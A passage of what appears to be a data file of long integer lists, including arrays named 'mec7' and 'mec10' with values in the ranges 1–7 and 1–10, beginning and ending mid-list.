1, 1, 2, 4, 3, 1, 2, 1, 4, 2, 4, 4, 1, 3, 1, 1, 4, 1, 4, 1, 3, 4, 4, 1, 
2, 4, 2, 4, 3, 4, 4, 2, 1, 3, 3, 1, 4, 3, 3, 1, 1, 3, 1, 4, 4, 2, 2, 3, 4, 4, 3, 4, 3, 4, 3, 1, 2, 4, 2, 3, 1, 4, 1, 2, 1, 3, 1, 2, 2, 4, 2, 1, 4, 1, 2, 3, 1, 2, 2, 1, 4, 4, 4, 4, 1, 1, 4, 4, 2, 1, 4, 1, 4, 3, 1, 3, 3, 4, 2, 3, 2, 4, 1, 1, 2, 3, 1, 4, 3, 4, 4, 2, 1, 4, 1, 4, 1, 4, 2, 1, 2, 1, 4, 1, 2, 3, 1, 1, 3, 3, 3, 3, 2, 4, 3, 4, 3, 4, 4, 2, 1, 4, 4, 1, 3, 2, 3, 2, 1, 1, 2, 2, 1, 2, 2, 3, 3, 2, 3, 1, 4, 3, 2, 4, 3, 1, 3, 1, 1, 3, 3, 1, 3, 4, 4, 3, 3, 1, 4, 1, 3, 1, 1, 2, 2, 1, 1, 4, 4, 1, 3, 2, 2, 4, 2, 4, 3, 4, 3, 3, 2, 2, 2, 3, 1, 1, 2, 1, 2, 2, 2, 3, 4, 1, 2, 1, 4, 4, 4, 4, 2, 1, 2, 1, 3, 3, 2, 1, 3, 3, 2, 2, 1, 1, 3, 4, 1, 4, 2, 2, 4, 2, 2, 3, 3, 4, 2, 1, 3, 4, 3, 3, 4, 3, 1, 1, 1, 1, 2, 4, 4, 2, 3, 1, 1, 4, 2, 1, 4, 4, 2, 2, 2, 2, 4, 1, 4, 2, 2, 1, 3, 4, 1, 2, 4, 3, 2, 1, 3, 4, 3, 2, 2, 2, 2, 3, 4, 1, 1, 2, 3, 4, 4, 2, 3, 1, 2, 3, 2, 3, 3, 2, 2, 3, 3, 2, 3, 2, 3, 4, 1, 3, 4, 3, 2, 2, 3, 4, 2, 4, 2, 3, 3, 1, 1, 4, 2, 4, 2, 4, 3, 4, 1, 2, 4, 3, 2, 2, 4, 3, 4, 1, 1, 4, 2, 1, 3, 3, 4, 2, 4, 2, 2, 4, 3, 1, 2, 4, 3, 1, 3, 4, 1, 1, 2, 2, 1, 2, 1, 4, 4, 2, 1, 1, 4, 4, 1, 3, 2, 3, 3, 4, 1, 3, 2, 4, 3, 3, 4, 2, 4, 4, 1, 1, 2, 2, 2, 2, 1, 3, 4, 1, 3, 4, 4, 1, 1, 3, 2, 1, 3, 4, 3, 3, 3, 2, 4, 4, 3, 3, 2, 2, 3, 1, 2, 1, 3, 4, 1, 2, 1, 2, 1, 3, 4, 4, 3, 4, 3, 4, 2, 3, 1, 3, 4, 1, 2, 3, 1, 1, 2, 1, 3, 1, 3, 3, 4, 2, 3, 1, 2, 1, 4, 2, 1, 3, 4, 1, 2, 2, 3, 1, 1, 4, 2, 2, 4, 4, 4, 1, 2, 2, 2, 2, 3, 4, 3, 1, 2, 2, 4, 3, 3, 2, 1, 4, 3, 4, 2, 2, 3, 3, 3, 1, 3, 3, 1, 2, 4, 3, 3, 4, 4, 2, 2, 3, 1, 1, 1, 4, 3, 4, 1, 2, 2, 3, 4, 4, 4, 4, 2, 4, 1, 3, 2, 1, 1, 3, 4, 4, 4, 4, 3, 3, 2, 3, 3, 1, 2, 4, 1, 4, 2, 2, 2, 4, 2, 1, 4, 4, 1, 2, 4, 2, 4, 2, 1, 2, 2, 4, 1, 4, 1, 1, 4, 2, 4, 2, 2, 1, 1, 2, 4, 4, 2, 2, 1, 2, 4, 2, 4, 2, 2, 4, 2, 4, 4, 2, 4, 4, 4, 2, 4, 4, 2, 4, 4, 2, 4, 2, 2, 2, 4, 4, 4, 2, 4, 4]
mec7 = [3, 4, 3, 7, 2, 7, 6, 1, 5, 7, 5, 1, 7, 6, 2, 6, 7, 2, 7, 2, 3, 6, 3, 6, 5, 3, 5, 1, 4, 4, 2, 5, 5, 3, 6, 2, 5, 7, 4, 3, 6, 4, 5, 4, 1, 5, 3, 3, 1, 3, 6, 1, 7, 3, 2, 5, 1, 2, 5, 4, 3, 2, 6, 6, 3, 6, 4, 1, 2, 2, 1, 7, 1, 7, 1, 6, 7, 5, 5, 4, 6, 4, 1, 5, 6, 3, 4, 3, 6, 2, 5, 5, 5, 2, 7, 2, 5, 1, 6, 6, 1, 3, 5, 6, 5, 4, 1, 2, 3, 1, 5, 7, 5, 3, 6, 6, 5, 1, 3, 1, 5, 6, 6, 1, 7, 2, 6, 3, 1, 7, 3, 7, 7, 6, 5, 6, 5, 6, 2, 5, 1, 2, 5, 4, 4, 1, 2, 5, 1, 7, 3, 5, 7, 2, 6, 4, 4, 6, 5, 6, 5, 6, 1, 1, 7, 6, 2, 5, 1, 7, 2, 5, 1, 4, 7, 6, 5, 4, 7, 6, 4, 7, 6, 4, 1, 7, 7, 3, 1, 1, 1, 1, 5, 3, 7, 6, 5, 3, 1, 1, 4, 1, 1, 2, 7, 3, 6, 2, 7, 6, 7, 4, 3, 3, 3, 2, 5, 1, 5, 2, 6, 3, 4, 2, 4, 6, 1, 1, 2, 5, 1, 1, 2, 5, 1, 5, 2, 7, 7, 1, 5, 6, 2, 3, 6, 5, 5, 5, 3, 2, 3, 5, 7, 7, 2, 1, 1, 7, 2, 6, 3, 4, 3, 7, 5, 5, 1, 2, 5, 2, 4, 2, 7, 2, 1, 4, 7, 7, 2, 1, 4, 3, 3, 1, 7, 5, 3, 6, 1, 5, 5, 3, 4, 2, 6, 3, 5, 1, 3, 6, 4, 6, 2, 3, 2, 2, 7, 7, 3, 6, 7, 7, 4, 1, 3, 6, 3, 4, 5, 6, 2, 5, 5, 5, 7, 2, 1, 4, 3, 1, 4, 7, 2, 4, 3, 7, 5, 3, 7, 3, 2, 3, 1, 3, 3, 2, 1, 7, 3, 4, 1, 6, 2, 2, 2, 7, 7, 3, 3, 3, 7, 3, 2, 5, 5, 7, 2, 6, 5, 3, 7, 2, 2, 6, 2, 6, 5, 7, 4, 2, 2, 2, 4, 5, 4, 2, 4, 6, 4, 4, 4, 1, 7, 6, 2, 4, 2, 7, 1, 3, 4, 5, 1, 6, 1, 2, 7, 4, 2, 7, 6, 6, 6, 7, 4, 5, 1, 6, 7, 4, 3, 6, 5, 4, 2, 1, 5, 7, 3, 6, 4, 4, 5, 4, 7, 7, 3, 6, 3, 3, 2, 4, 5, 1, 6, 1, 1, 5, 7, 7, 2, 7, 5, 6, 1, 4, 5, 5, 3, 3, 4, 7, 4, 5, 2, 2, 6, 6, 7, 1, 6, 7, 7, 3, 4, 1, 5, 1, 3, 3, 7, 4, 7, 4, 5, 6, 7, 1, 2, 4, 3, 7, 5, 2, 3, 6, 2, 2, 4, 2, 4, 4, 7, 1, 6, 7, 4, 2, 6, 5, 2, 1, 1, 3, 1, 2, 6, 1, 3, 4, 4, 3, 3, 1, 4, 7, 7, 1, 3, 3, 3, 6, 4, 1, 6, 6, 2, 4, 2, 4, 3, 5, 6, 3, 5, 1, 6, 6, 7, 2, 7, 5, 6, 4, 6, 1, 5, 2, 4, 6, 7, 6, 3, 5, 3, 5, 3, 1, 2, 1, 7, 2, 6, 7, 4, 4, 4, 1, 7, 3, 7, 3, 6, 2, 5, 6, 1, 3, 6, 5, 4, 4, 1, 1, 3, 3, 5, 6, 4, 5, 7, 6, 2, 6, 4, 7, 2, 6, 5, 7, 6, 3, 4, 5, 4, 1, 3, 5, 7, 7, 3, 3, 1, 3, 7, 4, 7, 7, 2, 4, 4, 6, 7, 6, 1, 7, 4, 2, 6, 4, 6, 6, 2, 4, 5, 4, 6, 5, 7, 1, 5, 1, 4, 7, 1, 5, 1, 5, 4, 7, 3, 7, 5, 7, 
1, 4, 2, 6, 6, 3, 7, 1, 3, 6, 4, 6, 7, 1, 4, 4, 3, 7, 2, 7, 2, 1, 6, 4, 2, 4, 4, 4, 1, 4, 4, 6, 3, 6, 6, 2, 4, 5, 6, 2, 4, 1, 6, 3, 1, 3, 1, 2, 2, 3, 2, 7, 6, 4, 3, 2, 1, 4, 1, 1, 7, 4, 2, 4, 2, 4, 6, 7, 2, 3, 6, 7, 1, 6, 1, 3, 7, 4, 4, 1, 4, 4, 6, 1, 1, 2, 7, 2, 2, 1, 5, 7, 5, 1, 1, 6, 4, 1, 7, 6, 5, 4, 5, 3, 2, 4, 1, 7, 7, 6, 7, 4, 4, 3, 4, 6, 2, 4, 6, 7, 1, 2, 5, 7, 6, 7, 4, 6, 1, 6, 6, 7, 2, 6, 6, 1, 1, 4, 7, 7, 2, 2, 4, 7, 2, 7, 7, 3, 1, 1, 3, 1, 2, 3, 3, 6, 6, 6, 3, 5, 5, 2, 4, 3, 7, 7, 2, 7, 2, 1, 7, 3, 4, 1, 5, 3, 6, 5, 6, 3, 5, 6, 2, 6, 6, 6, 4, 2, 3, 7, 1, 3, 6, 6, 3, 1, 1, 7, 3, 5, 2, 6, 2, 5, 7, 5, 1, 5, 1, 7, 3, 4, 7, 5, 6, 4, 3, 6, 2, 2, 1, 5, 6, 1, 7, 4, 1, 2, 2, 2, 4, 6, 2, 7, 7, 7, 7, 5, 6, 4, 7, 4, 6, 6, 5, 5, 2, 2, 6, 1, 2, 5, 1, 1, 7, 7, 7, 5, 1, 2, 4, 4, 5, 5, 7, 3, 7, 5, 3, 7, 2, 4, 4, 3, 4, 4, 2, 5, 2, 4, 5, 7, 4, 6, 6, 6, 7, 3, 7, 2, 4, 6, 6, 5, 7, 5, 2, 6, 2, 4, 3, 5, 6, 7, 2, 1, 3, 3, 1, 4, 5, 6, 4, 5, 7, 3, 1, 4, 1, 7, 6, 4, 7, 2, 4, 7, 6, 1, 4, 6, 7, 3, 6, 6, 3, 1, 1, 3, 3, 7, 3, 3, 1, 7, 4, 1, 4, 3, 5, 6, 6, 4, 7, 1, 5, 4, 5, 2, 1, 5, 7, 6, 4, 3, 3, 6, 7, 7, 1, 2, 7, 1, 5, 2, 2, 1, 7, 5, 4, 6, 6, 1, 4, 4, 1, 6, 2, 1, 5, 1, 2, 6, 6, 4, 3, 6, 2, 7, 5, 3, 2, 7, 5, 6, 4, 4, 7, 1, 5, 6, 7, 4, 3, 7, 5, 3, 3, 1, 5, 4, 6, 2, 4, 7, 7, 2, 1, 5, 7, 7, 3, 4, 7, 6, 6, 1, 5, 7, 5, 5, 3, 4, 7, 5, 7, 7, 2, 6, 4, 4, 1, 4, 2, 4, 4, 5, 3, 4, 6, 4, 7, 1, 7, 5, 5, 1, 7, 6, 3, 5, 7, 5, 6, 2, 7, 5, 3, 5, 4, 2, 7, 7, 7, 2, 7, 1, 2, 3, 1, 2, 1, 2, 4, 1, 1, 4, 5, 6, 4, 7, 1, 4, 5, 7, 5, 1, 3, 3, 3, 1, 5, 4, 6, 3, 7, 3, 4, 3, 5, 4, 1, 3, 3, 3, 2, 5, 3, 5, 1, 4, 2, 3, 1, 3, 6, 5, 3, 1, 3, 1, 5, 5, 1, 1, 5, 2, 5, 1, 2, 3, 5, 6, 3, 3, 3, 1, 5, 5, 1, 7, 6, 6, 6, 6, 6, 7, 1, 2, 3, 7, 5, 2, 2, 3, 2, 6, 3, 5, 6, 7, 4, 1, 4, 6, 5, 5, 4, 4, 7, 2, 6, 5, 3, 5, 4, 7, 6, 3, 6, 2, 5, 7, 7, 7, 4, 7, 2, 5, 7, 5, 1, 3, 1, 7, 3, 2, 3, 4, 2, 3, 6, 3, 7, 6, 5, 3, 4, 3, 5, 1, 1, 5, 7, 3, 1, 6, 1, 1, 4, 2, 1, 6, 3, 5, 4, 6, 2, 7, 1, 3, 3, 3, 5, 5, 4, 5, 7, 3, 7, 2, 7, 1, 5, 3, 6, 5, 
7, 7, 1, 3, 7, 6, 6, 6, 5, 2, 7, 3, 5, 1, 6, 5, 2, 7, 3, 1, 6, 2, 1, 2, 2, 4, 6, 3, 3, 2, 5, 7, 7, 5, 6, 1, 1, 1, 6, 4, 4, 2, 1, 3, 5, 4, 4, 4, 2, 4, 4, 1, 2, 3, 1, 3, 6, 7, 5, 6, 3, 7, 3, 7, 2, 5, 6, 4, 4, 3, 5, 7, 1, 2, 2, 6, 3, 1, 5, 2, 1, 6, 5, 3, 7, 1, 7, 7, 6, 3, 5, 7, 4, 1, 2, 4, 6, 4, 5, 7, 3, 3, 1, 4, 7, 6, 4, 7, 7, 4, 3, 7, 7, 5, 6, 7, 2, 3, 3, 3, 4, 4, 7, 6, 3, 4, 1, 2, 6, 6, 3, 2, 6, 2, 5, 1, 6, 6, 2, 2, 7, 7, 1, 3, 6, 6, 6, 7, 1, 5, 5, 5, 4, 2, 7, 2, 3, 2, 2, 2, 5, 5, 1, 3, 5, 6, 3, 5, 7, 1, 3, 1, 1, 1, 5, 4, 5, 5, 6, 2, 4, 6, 4, 1, 7, 4, 1, 5, 4, 5, 3, 3, 7, 1, 5, 7, 4, 6, 5, 1, 3, 1, 4, 3, 1, 6, 3, 4, 4, 7, 2, 1, 1, 7, 4, 3, 6, 7, 4, 1, 1, 7, 2, 6, 1, 1, 2, 3, 5, 4, 5, 7, 7, 1, 2, 1, 1, 4, 4, 5, 2, 4, 5, 2, 1, 3, 2, 7, 6, 4, 7, 4, 2, 5, 1, 3, 7, 4, 6, 6, 6, 6, 3, 4, 4, 6, 1, 7, 1, 4, 4, 7, 7, 2, 3, 5, 7, 2, 3, 1, 6, 4, 2, 6, 7, 2, 5, 6, 2, 7, 5, 2, 6, 5, 3, 1, 1, 4, 1, 7, 2, 5, 3, 3, 2, 3, 1, 2, 2, 5, 1, 1, 3, 5, 6, 6, 2, 7, 2, 5, 7, 6, 2, 5, 2, 1, 5, 4, 6, 7, 5, 5, 1, 4, 3, 3, 3, 6, 2, 2, 4, 4, 4, 5, 6, 3, 7, 1, 5, 7, 7, 6, 1, 3, 6, 7, 1, 3, 7, 3, 1, 2, 4, 1, 6, 7, 4, 1, 6, 1, 5, 2, 3, 7, 2, 2, 3, 3, 4, 7, 3, 1, 5, 2, 2, 5, 6, 1, 2, 3, 2, 6, 5, 7, 1, 5, 2, 4, 5, 4, 7, 5, 2, 1, 4, 2, 2, 2, 2, 4, 2, 3, 7, 5, 7, 7, 4, 5, 5, 3, 5, 5, 2, 5, 2, 6, 7, 2, 6, 2, 5, 4, 1, 3, 1, 2, 1, 4, 1, 1, 4, 4, 7, 6, 4, 1, 1, 2, 7, 2, 2, 2, 1, 1, 1, 3, 5, 1, 3, 4, 1, 6, 6, 4, 6, 2, 3, 3, 6, 5, 3, 7, 3, 2, 6, 2, 7, 1, 5, 7, 7, 2, 6, 5, 3, 2, 7, 4, 5, 6, 1, 1, 1, 2, 1, 6, 1, 6, 4, 4, 2, 2, 5, 5, 3, 7, 3, 1, 2, 2, 7, 5, 2, 3, 2, 1, 2, 1, 7, 7, 7, 5, 3, 5, 7, 7, 1, 1, 7, 5, 1, 1, 2, 7, 6, 5, 3, 7, 5, 5, 7, 5, 3, 4, 2, 6, 5, 3, 1, 1, 7, 6, 1, 7, 6, 6, 5, 6, 5, 5, 1, 3, 3, 4, 7, 3, 4, 4, 1, 2, 5, 7, 6, 1, 4, 7, 2, 6, 6, 3, 6, 7, 2, 7, 1, 6, 1, 3, 6, 3, 3, 5, 6, 7, 7, 5, 1, 3, 4, 7, 7, 2, 4, 7, 7, 4, 2, 4, 5, 2, 4, 4, 7, 5, 7, 4, 2, 6, 4, 5, 3, 6, 2, 7, 4, 6, 3, 4, 2, 1, 7, 4, 4, 7, 4, 2, 2, 4, 1, 7, 4, 6, 3, 4, 4, 4, 1, 5, 1, 2, 4, 6, 2, 2, 6, 1, 5, 7, 5, 1, 4, 4, 6, 1, 5, 1, 
1, 7, 2, 1, 3, 7, 6, 5, 5, 6, 4, 6, 1, 1, 1, 7, 5, 3, 5, 2, 5, 5, 1, 6, 2, 1, 6, 2, 1, 6, 7, 6, 3, 2, 1, 2, 6, 1, 2, 4, 1, 1, 3, 6, 4, 6, 6, 2, 3, 4, 4, 1, 4, 5, 2, 2, 6, 4, 6, 5, 3, 7, 7, 1, 6, 2, 2, 7, 1, 2, 6, 3, 6, 6, 4, 1, 3, 3, 6, 2, 5, 1, 1, 5, 2, 2, 7, 2, 4, 7, 1, 1, 3, 3, 1, 1, 2, 6, 1, 2, 3, 5, 7, 5, 6, 6, 2, 4, 2, 6, 6, 7, 5, 4, 5, 2, 6, 2, 1, 5, 3, 5, 6, 3, 4, 4, 6, 4, 3, 1, 4, 1, 6, 7, 1, 4, 3, 5, 7, 7, 3, 1, 5, 6, 3, 5, 7, 5, 4, 5, 7, 5, 2, 5, 6, 5, 3, 7, 7, 2, 3, 3, 4, 6, 5, 5, 6, 1, 2, 2, 7, 4, 6, 1, 6, 2, 6, 1, 6, 5, 7, 4, 6, 5, 5, 4, 6, 6, 3, 4, 6, 2, 7, 5, 2, 5, 6, 5, 6, 2, 4, 4, 6, 4, 4, 1, 5, 3, 5, 3, 7, 2, 7, 4, 4, 5, 3, 4, 1, 3, 3, 5, 2, 3, 3, 2, 4, 2, 1, 2, 7, 2, 7, 4, 3, 1, 3, 7, 6, 1, 5, 5, 3, 1, 3, 2, 7, 2, 4, 2, 1, 6, 3, 6, 7, 7, 3, 1, 6, 6, 1, 6, 1, 3, 3, 5, 2, 4, 3, 7, 3, 2, 2, 3, 2, 5, 4, 2, 5, 2, 7, 4, 4, 6, 6, 5, 6, 6, 1, 1, 4, 3, 1, 6, 1, 3, 5, 6, 1, 6, 1, 1, 1, 4, 1, 4, 4, 3, 3, 4, 1, 6, 1, 6, 7, 6, 2, 3, 4, 5, 2, 3, 5, 2, 1, 3, 7, 4, 5, 4, 7, 7, 1, 7, 5, 6, 5, 4, 6, 4, 7, 2, 1, 6, 5, 1, 3, 5, 4, 7, 2, 2, 2, 7, 1, 7, 1, 1, 1, 7, 3, 6, 7, 6, 3, 3, 6, 1, 5, 5, 5, 3, 3, 2, 4, 2, 6, 5, 4, 5, 7, 3, 1, 2, 1, 3, 6, 5, 1, 6, 4, 3, 1, 6, 1, 5, 1, 7, 7, 2, 1, 1, 3, 6, 1, 3, 7, 5, 1, 3, 1, 5, 4, 4, 1, 7, 1, 4, 4, 4, 2, 4, 6, 3, 2, 7, 3, 2, 1, 3, 2, 6, 6, 4, 2, 6, 7, 6, 7, 6, 3, 5, 6, 3, 7, 5, 3, 6, 6, 2, 6, 2, 4, 2, 3, 6, 7, 5, 2, 4, 3, 4, 3, 2, 7, 7, 3, 4, 7, 5, 2, 7, 3, 6, 2, 7, 3, 7, 4, 3, 7, 7, 7, 7, 3, 4, 6, 5, 5, 4, 6, 5, 2, 4, 4, 2, 4, 5, 3, 5, 4, 3, 2, 4, 3, 3, 3, 5, 4, 5, 6, 5, 6, 2, 4, 4, 6, 5, 2, 4, 2, 2, 6, 4, 2, 5, 4, 2, 4, 5, 2, 3, 5, 6, 3, 5, 5, 4, 3, 5, 2, 2, 3, 5, 2, 3, 3, 4, 3, 3, 2, 4, 2, 2, 3, 2, 4, 2, 4, 5, 5, 4, 3, 5, 3, 4, 4, 5, 2, 2, 4, 2, 5, 3, 5, 3, 4, 3, 2, 4, 2, 3, 3, 3, 5, 2, 3, 3, 4, 2, 3, 5, 4, 3, 5, 2, 3, 2, 3, 4, 3, 2, 5, 5]
mec10 = [2, 9, 2, 10, 3, 1, 6, 7, 2, 10, 4, 5, 8, 3, 7, 4, 2, 4, 6, 9, 1, 4, 7, 1, 10, 4, 2, 1, 6, 4, 3, 1, 6, 3, 8, 9, 7, 7, 8, 3, 7, 7, 5, 10, 4, 10, 10, 8, 1, 4, 3, 9, 9, 8, 10, 9, 7, 7, 1, 3, 5, 6, 9, 5, 1, 3, 6, 7, 8, 6, 7, 6, 7, 4, 9, 6, 10, 6, 10, 2, 6, 4, 4, 6, 8, 6, 3, 4, 3, 6, 8, 2, 6, 2, 7, 1, 10, 1, 8, 7, 7, 3, 4, 5, 4, 4, 5, 5, 3, 7, 3, 6, 5, 4, 3, 10, 5, 1, 8, 6, 7, 1, 3, 10, 2, 10, 2, 1, 6, 9, 4, 5, 2, 7, 10, 8, 10, 7, 6, 4, 1, 10, 4, 4, 6, 3, 5, 7, 2, 10, 5, 1, 7, 3, 3, 1, 2, 1, 10, 2, 3, 8, 9, 8, 7, 8, 9, 2, 4, 6, 10, 7, 7, 7, 4, 3, 2, 7, 10, 1, 7, 4, 7, 2, 3, 7, 6, 4, 8, 4, 1, 5, 9, 8, 10, 6, 5, 1, 5, 10, 9, 6, 10, 3, 9, 7, 10, 4, 4, 1, 4, 1, 1, 5, 4, 6, 4, 1, 10, 7, 6, 8, 9, 6, 8, 9, 1, 3, 9, 3, 8, 8, 7, 6, 2, 9, 1, 9, 10, 5, 8, 2, 5, 1, 1, 2, 3, 6, 9, 5, 9, 1, 1, 1, 1, 10, 7, 10, 4, 1, 6, 2, 5, 7, 4, 5, 10, 6, 5, 6, 3, 1, 6, 4, 6, 6, 4, 6, 8, 7, 7, 5, 8, 9, 3, 4, 6, 3, 10, 4, 6, 8, 10, 3, 1, 9, 10, 5, 1, 10, 3, 8, 4, 3, 5, 2, 9, 3, 6, 6, 10, 4, 10, 10, 1, 3, 3, 6, 9, 6, 10, 2, 8, 3, 4, 7, 5, 3, 8, 2, 7, 8, 10, 4, 4, 2, 2, 6, 8, 9, 7, 2, 10, 10, 5, 4, 5, 1, 10, 6, 6, 2, 7, 6, 4, 7, 3, 5, 3, 5, 8, 6, 6, 4, 5, 7, 9, 6, 4, 9, 1, 9, 6, 2, 2, 8, 6, 7, 6, 1, 6, 8, 10, 4, 6, 9, 2, 10, 10, 6, 8, 3, 1, 6, 8, 8, 9, 7, 7, 7, 8, 5, 9, 2, 4, 10, 3, 9, 4, 7, 10, 6, 8, 5, 4, 9, 5, 5, 1, 7, 10, 10, 10, 6, 3, 10, 4, 4, 9, 2, 5, 6, 1, 1, 7, 9, 8, 10, 9, 5, 7, 6, 4, 9, 1, 5, 10, 10, 5, 5, 10, 4, 6, 8, 7, 1, 1, 4, 2, 8, 1, 9, 7, 1, 3, 6, 5, 5, 10, 4, 3, 5, 8, 9, 9, 2, 7, 2, 3, 7, 10, 10, 9, 7, 6, 2, 4, 1, 3, 8, 6, 8, 3, 1, 5, 5, 10, 5, 2, 1, 3, 6, 3, 5, 7, 2, 4, 8, 3, 3, 1, 9, 8, 2, 2, 10, 4, 7, 3, 5, 8, 10, 4, 3, 4, 8, 7, 8, 2, 4, 7, 10, 6, 1, 8, 1, 6, 9, 7, 9, 7, 1, 3, 2, 6, 9, 6, 10, 7, 1, 2, 5, 8, 2, 10, 1, 4, 9, 9, 6, 5, 3, 9, 4, 1, 7, 8, 10, 2, 6, 2, 4, 8, 5, 2, 2, 5, 4, 1, 4, 3, 2, 9, 2, 5, 6, 2, 8, 2, 4, 10, 2, 5, 1, 1, 2, 6, 5, 8, 7, 10, 1, 1, 4, 9, 5, 10, 10, 5, 8, 7, 7, 10, 10, 4, 7, 2, 3, 5, 8, 9, 4, 8, 3, 10, 3, 3, 5, 3, 7, 2, 4, 3, 2, 8, 10, 10, 2, 6, 
9, 7, 1, 5, 6, 10, 8, 4, 5, 8, 2, 7, 4, 3, 10, 8, 9, 9, 5, 3, 2, 4, 6, 9, 8, 6, 10, 1, 9, 6, 1, 4, 3, 6, 1, 6, 1, 5, 7, 7, 10, 2, 7, 1, 7, 7, 2, 4, 4, 10, 1, 7, 1, 1, 7, 5, 2, 2, 5, 7, 6, 9, 4, 1, 5, 2, 10, 4, 3, 3, 10, 7, 1, 9, 9, 3, 3, 5, 9, 3, 6, 2, 2, 10, 2, 6, 8, 3, 3, 3, 4, 1, 8, 1, 4, 4, 9, 2, 7, 10, 3, 4, 7, 2, 3, 10, 4, 4, 7, 5, 4, 10, 2, 7, 3, 8, 5, 3, 1, 1, 1, 6, 6, 10, 1, 3, 9, 3, 5, 6, 10, 1, 8, 6, 10, 8, 10, 3, 9, 6, 8, 1, 6, 4, 2, 8, 9, 2, 5, 9, 4, 9, 4, 8, 7, 10, 4, 10, 9, 8, 10, 6, 3, 2, 10, 4, 5, 10, 9, 6, 4, 10, 5, 1, 3, 7, 4, 3, 7, 6, 9, 7, 8, 10, 6, 2, 4, 8, 6, 5, 1, 6, 6, 8, 1, 2, 7, 8, 7, 10, 7, 9, 8, 1, 6, 3, 1, 1, 5, 9, 1, 1, 3, 3, 3, 1, 6, 9, 6, 10, 5, 4, 5, 10, 2, 9, 5, 2, 2, 7, 6, 1, 5, 3, 4, 6, 1, 2, 6, 3, 4, 1, 8, 5, 2, 2, 7, 7, 4, 8, 1, 4, 1, 8, 9, 2, 5, 6, 10, 8, 8, 7, 4, 10, 6, 8, 3, 7, 5, 8, 4, 4, 5, 3, 4, 5, 6, 10, 7, 7, 7, 9, 4, 1, 6, 5, 6, 7, 6, 10, 3, 10, 3, 3, 2, 2, 4, 6, 1, 5, 9, 9, 9, 6, 9, 7, 6, 2, 5, 10, 10, 4, 2, 4, 7, 10, 4, 5, 10, 1, 5, 4, 7, 4, 1, 9, 2, 3, 7, 6, 9, 9, 5, 2, 1, 4, 6, 2, 7, 1, 4, 4, 6, 8, 9, 3, 4, 2, 4, 10, 9, 4, 8, 9, 5, 6, 9, 3, 3, 6, 7, 10, 7, 3, 5, 9, 5, 10, 3, 9, 10, 9, 6, 10, 7, 1, 4, 8, 7, 4, 10, 8, 3, 3, 10, 6, 1, 10, 1, 1, 1, 7, 6, 6, 2, 5, 6, 8, 10, 7, 4, 4, 9, 8, 2, 1, 1, 10, 2, 10, 9, 9, 7, 4, 6, 4, 7, 7, 8, 9, 9, 1, 9, 6, 10, 9, 6, 8, 5, 6, 9, 3, 6, 1, 10, 4, 7, 10, 1, 6, 8, 4, 3, 9, 1, 2, 2, 2, 10, 1, 7, 6, 8, 6, 1, 6, 6, 6, 10, 5, 9, 9, 5, 4, 9, 9, 1, 3, 10, 7, 3, 1, 4, 5, 9, 1, 1, 8, 3, 6, 6, 10, 5, 9, 5, 4, 9, 4, 7, 8, 7, 4, 8, 4, 4, 2, 9, 10, 9, 5, 3, 5, 7, 3, 8, 6, 3, 9, 2, 6, 9, 7, 6, 2, 3, 3, 10, 9, 3, 4, 3, 8, 9, 6, 2, 3, 9, 6, 8, 3, 5, 8, 3, 2, 10, 3, 3, 2, 1, 2, 1, 2, 8, 7, 6, 4, 6, 4, 5, 1, 2, 5, 1, 8, 10, 6, 2, 7, 6, 4, 3, 4, 6, 9, 1, 1, 8, 8, 3, 10, 3, 10, 9, 4, 4, 9, 10, 8, 1, 2, 7, 6, 4, 1, 5, 8, 10, 2, 3, 5, 8, 4, 6, 8, 2, 7, 3, 4, 8, 9, 3, 4, 8, 1, 10, 8, 5, 6, 8, 4, 9, 10, 3, 8, 5, 9, 8, 7, 3, 9, 2, 9, 9, 3, 3, 5, 5, 4, 6, 10, 6, 5, 6, 6, 7, 9, 10, 9, 9, 1, 8, 8, 8, 9, 7, 
10, 9, 9, 7, 1, 8, 9, 2, 7, 9, 4, 5, 1, 4, 7, 1, 2, 3, 8, 7, 2, 7, 4, 9, 1, 3, 10, 10, 3, 1, 1, 4, 2, 8, 4, 5, 2, 4, 7, 5, 7, 6, 9, 6, 8, 8, 10, 3, 9, 5, 8, 2, 3, 4, 3, 5, 10, 5, 8, 10, 9, 4, 7, 4, 10, 5, 1, 2, 9, 8, 3, 6, 5, 8, 4, 7, 3, 5, 6, 6, 1, 9, 7, 7, 9, 8, 10, 7, 5, 6, 9, 6, 4, 9, 9, 6, 10, 1, 5, 2, 4, 7, 9, 3, 3, 4, 2, 6, 3, 1, 8, 5, 10, 9, 7, 5, 9, 10, 5, 7, 7, 8, 7, 6, 9, 4, 3, 6, 1, 7, 7, 9, 1, 3, 7, 8, 3, 9, 6, 2, 5, 5, 1, 8, 2, 3, 9, 7, 5, 9, 6, 7, 4, 3, 4, 7, 2, 1, 1, 4, 6, 2, 9, 8, 3, 2, 8, 2, 5, 1, 3, 6, 1, 6, 7, 3, 3, 1, 3, 6, 10, 1, 6, 5, 4, 3, 6, 7, 8, 3, 6, 2, 3, 5, 9, 9, 9, 2, 10, 10, 1, 3, 4, 10, 8, 5, 10, 4, 2, 1, 7, 3, 2, 10, 6, 4, 3, 4, 4, 7, 8, 5, 2, 4, 4, 6, 9, 8, 8, 4, 4, 6, 9, 4, 7, 6, 4, 8, 8, 10, 2, 10, 6, 4, 3, 10, 2, 10, 6, 10, 9, 8, 2, 3, 9, 5, 3, 3, 2, 8, 1, 2, 1, 9, 4, 5, 4, 8, 9, 10, 10, 8, 7, 10, 3, 3, 1, 1, 10, 8, 2, 5, 8, 4, 7, 9, 6, 3, 6, 6, 4, 2, 2, 3, 9, 6, 7, 4, 8, 4, 9, 7, 1, 8, 4, 7, 5, 7, 4, 2, 5, 5, 5, 1, 6, 6, 3, 7, 6, 7, 1, 9, 8, 5, 6, 10, 6, 8, 6, 5, 3, 2, 3, 9, 5, 2, 5, 6, 2, 6, 8, 9, 4, 7, 9, 7, 10, 1, 5, 10, 9, 4, 9, 8, 4, 1, 7, 10, 4, 3, 10, 9, 6, 10, 10, 9, 10, 10, 4, 9, 5, 5, 8, 9, 8, 5, 9, 5, 7, 7, 9, 9, 10, 4, 6, 6, 7, 10, 5, 3, 8, 10, 5, 2, 3, 3, 5, 7, 9, 10, 6, 6, 5, 6, 8, 4, 10, 1, 9, 7, 1, 7, 4, 6, 5, 7, 10, 1, 9, 2, 3, 1, 3, 5, 8, 9, 9, 10, 8, 3, 8, 3, 5, 3, 10, 8, 10, 5, 2, 5, 10, 5, 5, 10, 10, 10, 10, 9, 5, 6, 2, 8, 2, 2, 10, 2, 3, 9, 4, 7, 8, 7, 8, 5, 9, 4, 10, 2, 6, 9, 9, 7, 1, 7, 6, 7, 10, 10, 1, 2, 8, 7, 